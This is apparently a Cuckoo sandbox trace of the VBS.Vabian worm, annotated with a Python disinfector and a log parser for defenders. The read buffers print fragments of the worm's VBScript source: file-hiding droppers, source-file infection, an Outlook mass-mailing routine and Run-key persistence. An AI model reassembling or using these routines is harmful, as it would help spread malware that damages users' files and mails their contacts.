readpasmarker.write "begin" & vbcrlf & "AssignFi FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => le (Vabian,'C:\Windows\STARTM~1\programs\startup\Vabian.vbs');" & vbcrlf
readpasmarker.write "Rewrite (Vabian);" & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => allsourcepas & vbcrlf & "CloseFile(Vabian);" & vbcrlf
readpasmarker.close
end if
end if
If fso.GetExtensionName(fil FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => e.path)="bmp" or fso.GetExtensionName(file.path)="jpg" or fso.GetExtensionName(file.path)="gif" or fso.GetExtensionName(file.pat FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => h)="ico" then
For i = 1 To 8
fvar = Chr(Int(22 * Rnd) + 97)
varall = fvar & varall
Next
on error resume next
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => bathelp = file.path & ".bat"
Set dropper = Fso.Createtextfile(bathelp, True)
dropper.writeline "Attrib +h " & file.path
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer =>
dropper.Close
executor.run bathelp
fso.Deletefile bathelp
vbscopy = file.path & ".VX"
Set dropper2 = Fso.Createte FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => xtfile(vbscopy, True)
dropper2.write "Set " & varall & " = wscript.CreateObject(" & chr(34) & "WScript.Shell" & chr(34) & ")" FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => & vbcrlf & "Sucke.run " & chr(34) & file.path & chr(34) & vbcrlf
dropper2.write scr
dropper2.Close
end if
next
Se FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => t Subfolders = folder.SubFolders
For Each Subfolder in Subfolders
FindVictim Subfolder.path
Next
end function
Set FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => spreader =CreateObject("Outlook.Application")
Set spreader =spreader.GetNameSpace("MAPI")
For Each C In spreader.AddressLists
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer =>
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count
Set spreader=C.AddressEntries(D)
Set spreader=spreader FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => .CreateItem(0)
spreader.To=aaaaaaaa.Address
spreader.Subject="Vabian Milenium"
spreader.Body="Stop asking,just checkout the a FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => ttachment"
spreader.Attachments.Add(Fso.GetSpecialFolder(0)&"\Vabian.vbs")
spreader.DeleteAfterSubmit=True
'//If spreader.To FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => <> "" Then
'//spreader.Send
'//End If
Next
End If
Next
'VabianMarker FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => FileHandle => 0x0000020c |
FAILURE | 0xc0000011 | |
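The read of `C:\windows\backup_vabian.sys` ends here with STATUS_END_OF_FILE (0xC0000011), and the buffers above give the whole FindVictim routine: for every `.frm`, `.cpp` and `.pas` file on every ready drive it reads line 1 with ReadLine, compares it against a fixed marker, and if absent rewrites the file as marker, the remaining original text, and an appended block that re-creates `vabian.vbs` and launches it when the form unloads. The following is an added example, not part of the Cuckoo report and not the worm's code: a cleaner that recognises those markers and strips what the infector added. Every string it matches on is taken from the buffers above; the infected `.frm` it builds for demonstration is constructed, with the worm's `? #1,` payload lines shortened to one.

```python
"""Detect and strip the VBS.Vabian source-file infection (.frm, .cpp, .pas).

Added example; not part of the Cuckoo report or the worm. It undoes what the
FindVictim routine in the NtReadFile buffers above does: write its marker as
line 1, copy the rest of the victim file, then append a dropper block.
"""

# Per extension: the marker the worm writes as line 1 (it is also the worm's
# own re-infection check) and the first text of the block it appends.
SIGNATURES = {
    "frm": ("Rem W32.hllp.Vabian", "Private Sub form_unload(cancel As Integer)"),
    "cpp": ("// W32.hllp.Vabian", 'wormvabian = fopen("vabian.vbs","wt");'),
    "pas": ("{ W32.hllp.Vabian }",
            "procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);"),
}


def _newline(text):
    """The worm writes vbCrLf; tolerate files that were normalised to LF since."""
    return "\r\n" if "\r\n" in text else "\n"


def is_infected(ext, text):
    """True when line 1 is the marker the worm tests before infecting."""
    return text.split(_newline(text), 1)[0] == SIGNATURES[ext][0]


def disinfect(ext, text):
    """Return (restored_text, notes). Restoration is lossy by construction: the
    worm reads the victim's first line with ReadLine to compare it against the
    marker and never writes it back, so that line must come from backup or VCS."""
    if not is_infected(ext, text):
        return text, ["not infected"]
    nl = _newline(text)
    tail_start = SIGNATURES[ext][1]
    parts = text.split(nl, 1)                          # drop the marker line
    body = parts[1] if len(parts) > 1 else ""
    notes = ["marker line removed",
             "original line 1 was consumed by the infector and is not recoverable"]
    decl = "FILE *Vabian;" + nl                        # the .cpp branch prepends this too
    if ext == "cpp" and body.startswith(decl):
        body = body[len(decl):]
        notes.append("'FILE *Vabian;' declaration removed")
    cut = body.find(tail_start)
    if cut < 0:
        notes.append("appended dropper block not found; rest left unchanged")
        return body, notes
    body = body[:cut]
    # .frm/.pas: one vbCrLf is inserted between original and block;
    # .cpp: the fopen() line is glued straight onto the original's last byte.
    if ext != "cpp" and body.endswith(nl):
        body = body[:-len(nl)]
    notes.append("appended dropper block removed")
    return body, notes


def sample_infected_frm():
    """Constructed sample laid out as the .frm branch writes it: marker,
    surviving original lines, vbCrLf, then the injected Form_Unload handler
    (its '? #1,' payload lines shortened to one)."""
    original_rest = "Begin VB.Form Form1\r\nEnd\r\n"
    injected = (
        "Private Sub form_unload(cancel As Integer)\r\n"
        "On Error GoTo err:\r\n"
        'Open "C:\\vabian.vbs" for output as #1\r\n'
        "\r\n? #1,Rem VBS.W32.I-worm.Vabian\r\n"
        "close #1\r\n"
        'shell "C:\\vabian.vbs"\r\n'
        'msgbox "Your Program has been infected by Vabian virus Created by '
        'Psychologic",VbInformation,"W32.VBS.Vabian"\r\n'
        "exit sub\r\nerr:\r\nEnd sub\r\n"
    )
    return "Rem W32.hllp.Vabian\r\n" + original_rest + "\r\n" + injected


if __name__ == "__main__":
    restored, notes = disinfect("frm", sample_infected_frm())
    print(restored, *notes, sep="\n")
```

Two caveats follow from the infector as read above. It overwrites the victim's first line with the marker, so a cleaner can only remove what was added, never restore that line. And the injected C++ and Pascal fragments do not compile as written (the `.cpp` branch declares `FILE *Vabian;` but writes through `wormvabian`, and the Pascal handler stops at `CloseFile(Vabian);` with no closing `end;`), so a sudden build failure across a project's `.cpp` or `.pas` units is itself a usable tripwire.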
| 19:40:26,513 | 252 | FindFirstFileExW |
FileName => C:\WINDOWS |
SUCCESS | 0x001b17c8 | |
| 19:40:26,513 | 252 | RegCreateKeyExA |
Handle => 0x0000020c Access => 2 Registry => 0x80000002 Class => SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | RegSetValueExA |
Handle => 0x0000020c Buffer => wscript.exe C:\WINDOWS\vabian.vbs %\x00 ValueName => Vabian Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs |
SUCCESS | 0x001b17c8 | |
| 19:40:26,513 | 252 | CopyFileW |
ExistingFileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs NewFileName => C:\WINDOWS\vabian.vbs |
SUCCESS | 0x00000001 | |
| 19:40:26,513 | 252 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000020c FileInformation => |
FAILURE | 0x80000006 | |
| 19:40:26,513 | 252 | NtCreateFile |
ShareAccess => 1 FileName => C:\payload.txt DesiredAccess => 0x40100080 CreateDisposition => 5 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtWriteFile |
Buffer => VBS.Vabian
-------------
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,523 | 252 | NtWriteFile |
Buffer => Dear user ...
I just want to tell you something
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,523 | 252 | NtWriteFile |
Buffer => Your computer has been infected with virus,it called VBS.Vabian
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,523 | 252 | NtWriteFile |
Buffer => If you are an Programer, go look at your project check all your frm or cpp or pas files
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,523 | 252 | NtWriteFile |
Buffer => Cos that is the victim
Ok I have to go now
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,523 | 252 | NtWriteFile |
Buffer => --------------------------------------------------
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,533 | 252 | NtWriteFile |
Buffer => Made by Psychologic aka Puppy - Indonesian hip-hop singer FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,533 | 252 | LdrLoadDll |
Flags => 1305816 BaseAddress => 0x7c9c0000 FileName => shell32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,533 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => ShellExecuteExW FunctionAddress => 0x7ca02f03 ModuleHandle => 0x7c9c0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,573 | 252 | ShellExecuteExW |
Show => 1 Parameters => FilePath => C:\payload.txt |
SUCCESS | 0x00000001 | |
| 19:40:26,573 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\* |
SUCCESS | 0x001b08d0 | |
| 19:40:26,573 | 252 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000023c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xa6kXc\xec\xd0\x01\x90\x9e\x04?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00be runp\x00\x00\x00\x00\x00\x00\x000\x03\x1a?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x01\xbf\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x009\x006\x004\x00.\x00i\x00n\x00i\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xf6\xfd\x98\xa3\x9f\xd3\x01ps\xfb>\xac\x9f\xd3\x01\xb0\xf6\xfd\x98\xa3\x9f\xd3\x01\xb0\xf6\xfd\x98\xa3\x9f\xd3\x01 |
SUCCESS | 0x00000000 | |
| 19:40:26,573 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1 |
SUCCESS | 0x001e5030 | 13 times |
| 19:40:26,583 | 252 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000023c FileInformation => |
FAILURE | 0x80000006 | |
| 19:40:26,583 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\* |
SUCCESS | 0x001b08d0 | |
| 19:40:26,583 | 252 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000023c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xa6kXc\xec\xd0\x01`\x8a\x1b?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00be runp\x00\x00\x00\x00\x00\x00\x000\x03\x1a?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x01\xbf\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x009\x006\x004\x00.\x00i\x00n\x00i\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xf6\xfd\x98\xa3\x9f\xd3\x01ps\xfb>\xac\x9f\xd3\x01\xb0\xf6\xfd\x98\xa3\x9f\xd3\x01\xb0\xf6\xfd\x98\xa3\x9f\xd3\x01 |
SUCCESS | 0x00000000 | |
| 19:40:26,583 | 252 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000023c FileInformation => |
FAILURE | 0x80000006 | |
| 19:40:26,593 | 252 | RegOpenKeyExW |
Handle => 0x0000023c Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,593 | 252 | RegQueryValueExW |
Handle => 0x0000023c Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,593 | 252 | RegCloseKey |
Handle => 0x0000023c |
SUCCESS | 0x00000000 | |
| 19:40:26,593 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000000 SubKey => Outlook.Application |
FAILURE | 0x00000002 | 1 time |
| 19:40:26,593 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Windows\App Management |
FAILURE | 0x00000002 | |
| 19:40:26,593 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Windows\App Management |
FAILURE | 0x00000002 | |
| 19:40:26,603 | 252 | RegCloseKey |
Handle => 0x000001be |
SUCCESS | 0x00000000 | |
| 19:40:26,603 | 252 | RegCloseKey |
Handle => 0x000001a2 |
SUCCESS | 0x00000000 | |
| 19:40:26,603 | 252 | RegOpenKeyExW |
Handle => 0x000001a0 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,603 | 252 | RegQueryValueExW |
Handle => 0x000001a0 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,603 | 252 | RegCloseKey |
Handle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 19:40:26,603 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000000 SubKey => Outlook.Application |
FAILURE | 0x00000002 | 1 time |
| 19:40:26,613 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00001000 BaseAddress => 0x001ab000 |
SUCCESS | 0x00000000 | |
| 19:40:26,613 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00003000 BaseAddress => 0x001b8000 |
SUCCESS | 0x00000000 | |
| 19:40:26,613 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00002000 BaseAddress => 0x001e6000 |
SUCCESS | 0x00000000 | |
| 19:40:26,613 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00002000 BaseAddress => 0x001cf000 |
SUCCESS | 0x00000000 | |
| 19:40:26,623 | 252 | LdrLoadDll |
Flags => 1307652 BaseAddress => 0x7c800000 FileName => kernel32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,623 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetUserDefaultUILanguage FunctionAddress => 0x7c813100 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 19:40:26,623 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x001d1000 |
SUCCESS | 0x00000000 | |
| 19:40:26,623 | 292 | ExitThread |
ExitCode => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,633 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x0000e000 BaseAddress => 0x001e8000 |
SUCCESS | 0x00000000 | |
| 19:40:26,633 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x0019b000 |
SUCCESS | 0x00000000 | |
| 19:40:26,633 | 252 | RegCloseKey |
Handle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000166 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x000001a6 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x0000019e |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x000001c2 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000100 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x000000f8 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x000000ec |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000118 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000110 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000108 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000128 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000120 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000140 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000138 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000130 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000148 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000158 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000150 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x000000f2 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00003000 BaseAddress => 0x001be000 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x00185000 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00005000 BaseAddress => 0x001c1000 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x00196000 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x001a6000 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00006000 BaseAddress => 0x001d5000 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | ExitProcess |
ExitCode => 0 |
SUCCESS | 0x00000000 |
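Read as a sequence rather than row by row, the trace above tells a compact story: handle 0x0000020c is opened on `backup_vabian.sys`, read back in fixed-size NtReadFile chunks until STATUS_END_OF_FILE (0xC0000011), then recycled a few records later for the `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` key that receives the `Vabian` autorun value; CopyFileW drops the script to `C:\WINDOWS\vabian.vbs`; and the HKCR lookup of `Outlook.Application` fails with ERROR_FILE_NOT_FOUND (2), which is why the mail-spreading branch of the script produces no further activity. The following is an added example, not part of the Cuckoo report: a parser for this record layout that reassembles the read buffers and pulls those indicators out, run on a handful of records copied from this section (read chunks shortened). It keeps line breaks exactly as the report rendered them and makes no guess about CR and LF bytes split across a chunk boundary.

```python
"""Rebuild the file read above from its NtReadFile chunks and pull behavioural
indicators from the same Cuckoo 1.2 trace. Added example, not part of the report;
SAMPLE_LOG is copied from records in this section (read chunks shortened). Record
layout: '| time | thread | function |', argument line(s), 'SUCCESS|FAILURE | 0x.. |'."""
import re

HEADER = re.compile(r"^\| (\d\d:\d\d:\d\d,\d+) \| (\d+) \| (\w+) \|$")
STATUS = re.compile(r"^(SUCCESS|FAILURE) \| (0x[0-9a-fA-F]+) \|")
STATUS_END_OF_FILE = "0xc0000011"
HIVES = {"0x80000000": "HKCR", "0x80000001": "HKCU", "0x80000002": "HKLM"}


def parse_records(log_text):
    """Yield {time, thread, func, args, status, ret} for each API call."""
    rec, arg_lines = None, []
    for line in log_text.splitlines():
        head, tail = HEADER.match(line), STATUS.match(line)
        if head:
            rec, arg_lines = {"time": head[1], "thread": int(head[2]), "func": head[3]}, []
        elif tail and rec is not None:
            rec.update(args="\n".join(arg_lines), status=tail[1], ret=tail[2].lower())
            yield rec
            rec = None
        elif rec is not None:
            arg_lines.append(line)


def arg(rec, name):
    """Value of 'name => value'; it runs to the next ' Key =>' or the closing '|'."""
    m = re.search(r"(?:^|\s)" + re.escape(name) + r" => ?(.*?)(?=\s[A-Za-z]+ =>|\s*\|$|$)", rec["args"], re.S)
    return m[1] if m else None


def reassemble_reads(records, file_name):
    """Join NtReadFile buffers on the handle NtCreateFile returned for file_name, up to
    STATUS_END_OF_FILE. Handle values are recycled (0x0000020c is reused above for a
    registry key), so the window is bounded by that open, not by the value alone."""
    handle, chunks = None, []
    for rec in records:
        if rec["func"] == "NtCreateFile" and arg(rec, "FileName") == file_name:
            handle, chunks = arg(rec, "FileHandle"), []
        elif handle and rec["func"] == "NtReadFile" and arg(rec, "FileHandle") == handle:
            if rec["status"] == "FAILURE" and rec["ret"] == STATUS_END_OF_FILE:
                return "".join(chunks)
            chunks.append(arg(rec, "Buffer") or "")
    return "".join(chunks) if handle else None


def extract_iocs(records):
    """(kind, detail) pairs: autorun value, self-copy, and a COM ProgID the guest lacks."""
    iocs, open_keys = [], {}        # registry handle -> key path, until RegCloseKey
    for rec in records:
        f = rec["func"]
        if f in ("RegCreateKeyExA", "RegOpenKeyExW") and rec["status"] == "SUCCESS":
            hive = HIVES.get(arg(rec, "Registry"), arg(rec, "Registry"))
            open_keys[arg(rec, "Handle")] = f"{hive}\\{arg(rec, 'SubKey')}"
        elif f == "RegCloseKey":
            open_keys.pop(arg(rec, "Handle"), None)
        elif f == "RegSetValueExA":
            key = open_keys.get(arg(rec, "Handle"), "<unknown key>")
            data = (arg(rec, "Buffer") or "").replace("\\x00", "")  # rendered NUL terminator
            kind = "persistence:run-key" if key.lower().endswith("\\run") else "registry-write"
            iocs.append((kind, f"{key}\\{arg(rec, 'ValueName')} = {data}"))
        elif f == "CopyFileW" and rec["status"] == "SUCCESS":
            iocs.append(("self-copy", arg(rec, "NewFileName")))
        elif f == "RegOpenKeyExW" and arg(rec, "SubKey") == "Outlook.Application":
            iocs.append(("capability-absent", "Outlook.Application not registered; mail spreader could not run"))
    return iocs


SAMPLE_LOG = r"""| 19:40:26,513 | 252 | NtCreateFile |
ShareAccess => 3 FileName => C:\windows\backup_vabian.sys DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => Rem VBS.W32.I-worm.Vabian
Rem Mailto : Psychologic@hot FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => mail.com
date2 = #06/01/2018# FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => FileHandle => 0x0000020c |
FAILURE | 0xc0000011 | |
| 19:40:26,513 | 252 | RegCreateKeyExA |
Handle => 0x0000020c Access => 2 Registry => 0x80000002 Class => SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | RegSetValueExA |
Handle => 0x0000020c Buffer => wscript.exe C:\WINDOWS\vabian.vbs %\x00 ValueName => Vabian Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | CopyFileW |
ExistingFileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs NewFileName => C:\WINDOWS\vabian.vbs |
SUCCESS | 0x00000001 | |
| 19:40:26,593 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000000 SubKey => Outlook.Application |
FAILURE | 0x00000002 | 1 time |
"""
if __name__ == "__main__":
    recs = list(parse_records(SAMPLE_LOG))
    print(reassemble_reads(recs, r"C:\windows\backup_vabian.sys"), *extract_iocs(recs), sep="\n")
```

Scoping the reassembly to the window between the NtCreateFile and the STATUS_END_OF_FILE record matters more than it looks: the same handle value is handed out again for the registry key a few records later, and, earlier in the trace, for the script's own reads of `wscript.scriptfullname`, so keying on the handle alone would splice unrelated buffers together. The registry correlation has the same shape: a RegSetValueExA record names only a handle, and the key path comes from the RegCreateKeyExA that produced it, which is why the map is cleared on RegCloseKey.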
| Timestamp | Thread | Function | Arguments | Status | Return | Repeated |
|---|---|---|---|---|---|---|
| 19:40:26,664 | 968 | GetSystemMetrics |
SystemMetricIndex => 41 |
SUCCESS | 0x00000000 | |
| 19:40:26,664 | 968 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RegisterPenApp FunctionAddress => 0x010013d8 ModuleHandle => 0x01000000 |
FAILURE | 0xc000007a | |
| 19:40:26,664 | 968 | GetSystemMetrics |
SystemMetricIndex => 41 |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,664 | 968 | RegCreateKeyExW |
Handle => 0x000000bc Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Notepad |
SUCCESS | 0x00000000 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfEscapement Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfOrientation Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfWeight Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfItalic Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfUnderline Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfStrikeOut Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfCharSet Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfOutPrecision Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfClipPrecision Type => 523672 |
FAILURE | 0x00000002 | |
| 19:40:26,664 | 968 | RegQueryValueExW |
Handle => 0x000000bc DataLength => 4 ValueName => lfQuality Type => 523672 |
FAILURE | 0x00000002 | |
